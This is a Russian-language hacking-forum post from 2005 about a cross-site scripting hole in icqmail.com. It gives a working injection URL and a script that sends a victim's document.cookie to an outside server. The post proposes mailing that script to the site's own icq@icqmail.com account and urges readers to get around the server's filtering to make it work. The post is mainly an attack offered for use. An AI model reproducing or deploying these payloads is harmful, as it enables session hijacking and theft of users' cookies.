23.09.2005, 14:31
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767
Репутация:
1060
|
|
www.icqmail.com [XSS]
Для тех кто не знал:
На сайте www.icq.com нам предоставляют зарегестрировать мыло. Кому это нужно? Нам не нужно.... нужно им =)
Код:
http://www.icqmail.com/tnb_single.asp?foldername=options&tabup=?"><script>alert(document.cookie)</script>
Довольно распространнённая XSS.
Но, как ни странно есть НО. Посылается письмо на мыло icq@icqmail.com от наивного чукотского парня с примерно вот таким содержанием
Код:
<script>img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg'+document.cookie;</script>
пройдя через сервер "мыльной аськи" наши старания не увенчаются успехом. Начальный и конечный тег скрипта будет искривлён.
Мы же простые албанские юноши и девушки можем понять структуру замены нашего кода и вывести нормально рабочий скрипт.
Удачи в реале
__________________
ICQ 9731923
|
|
|